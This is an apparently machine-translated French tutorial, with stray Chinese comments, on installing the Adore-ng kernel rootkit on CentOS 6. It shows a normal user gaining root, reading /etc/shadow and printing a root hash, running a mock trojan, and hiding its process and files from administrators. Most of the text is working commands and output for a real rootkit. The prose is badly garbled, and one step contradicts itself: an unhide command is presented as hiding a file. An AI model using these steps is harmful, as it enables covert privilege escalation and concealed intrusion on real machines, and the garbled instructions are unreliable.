Rootkit est un type particulier de logiciel malveillant, sa fonction est de se cacher et les fichiers spécifiés, des processus et des liens Web et d' autres informations sur la cible d'installation, voir plus généralement est rootkit et les chevaux de Troie, backdoors et autres programmes malveillants en collaboration .
Et aujourd'hui , nous voulons apprendre est de simuler comme un malware Rootkit: ADORE-ng
environnement: CentOS 6
deux ressources utilisées ici besoin (télécharger):
Installation ADORE-ng
monté confiance: kernel-devel-2.6
[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm
Loaded plugins: fastestmirror, security
Setting up Install Process
……
Installed:
kernel-devel.x86_64 0:2.6.32-754.27.1.el6
Complete!
L'extraction de l'installateur amour-ng
[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root 1143 Dec 30 2015 Makefile
# 已经有 makefile 文件,直接 make -j 4 编译即可
[root@Fp-01 adore-ng-master]# make -j 4
Module de charge
[root@Fp-01 adore-ng-master]# insmod adore-ng.ko
Voir Aide
[root@Fp-01 adore-ng-master]# ./ava
I print info (secret UID etc)
h hide file # 隐藏文件
u unhide file # 取消隐藏文件
r execute as root # 以root用户执行
R remove PID forever # 永久删除PID
U uninstall adore # 卸载 adore
i make PID invisible # 隐藏PID
v make PID visible # 取消隐藏PID
Les utilisateurs ordinaires à racine mentionnent le droit
d'ajouter un utilisateur à tester l'utilisation d'une volonté commune
[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.
Copiez ADORE-ng à l'autre / tmp, parce que le commutateur ne peut pas entrer dans le répertoire personnel de l'utilisateur root, cp -r: copie récursive
[root@Fp-01 ~]# cp -r adore-ng-master /tmp/
Changer d'utilisateur, utilisez le serveur de connexion utilisateur tom
[root@Fp-01 ~]# ssh [email protected]
Are you sure you want to continue connecting (yes/no)? yes
tom@10.0.0.11's password:
[tom@Fp-01 ~]$ whoami
tom
Test, modifier / etc / shadow
[tom@Fp-01 ~]$ vim /etc/shadow ……
"/etc/shadow" [Permission Denied]
Vous pouvez le voir, la permission est refusée, cette fois-ci, il faut mentionner le droit d'utiliser ava
[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
……
Voir sur un autre processus terminal, l'identité de l'utilisateur est la racine, le droit de dire explicitement mentionné le succès
[root@Fp-01 ~]# ps -ef |grep /etc/shadow
root 32703 30867 0 12:03 pts/3 00:00:00 vim /etc/shadow
root 32727 32667 0 12:03 pts/4 00:00:00 grep /etc/shadow
Cachée processus de Troie
simulation modifier un programme cheval de Troie
[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.
#!/bin/bash
while :
do
echo `This is the virus` >> date.txt
sleep 1
done
Les chevaux de Troie sortie analogique simple « Ceci est le virion », plus les droits d'exécution, en cours d'exécution en arrière-plan
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.
Aller à la vue le processus par ID de processus
[tom@Fp-01 script]$ ps -ef |grep 33987
root 33987 30867 0 12:14 pts/3 00:00:00 /bin/bash ./a.sh
root 34137 33987 0 12:14 pts/3 00:00:00 sleep 1
tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
Vous pouvez voir, puis, les pirates processus cachés simulation
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.
succès caché, cette fois-ci, nous allons voir le processus de découverte, le processus a été caché
[tom@Fp-01 script]$ ps -ef |grep 33987
tom 34139 30867 0 12:14 pts/3 00:00:00 grep 33987
Un changement de taille: les fichiers cachés
premier à voir le répertoire / opt sous les informations de fichier
[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
├── a.sh
└── date.txt
Nous simulons cacher date.txt
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.
Cette fois-ci pour voir, vous ne pouvez pas trouver un fichier a été trouvé
[root@Fp-01 script]# tree /opt/
/opt/
└── script
└── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root 77 Feb 13 12:13 a.sh
l' escalade des privilèges aux privilèges root -> parent Cacher -> processus parent commence un processus enfant (virion) -> Masquer les dossiers
un tel cheval de Troie est terminée, l'administrateur du système est difficile à trouver
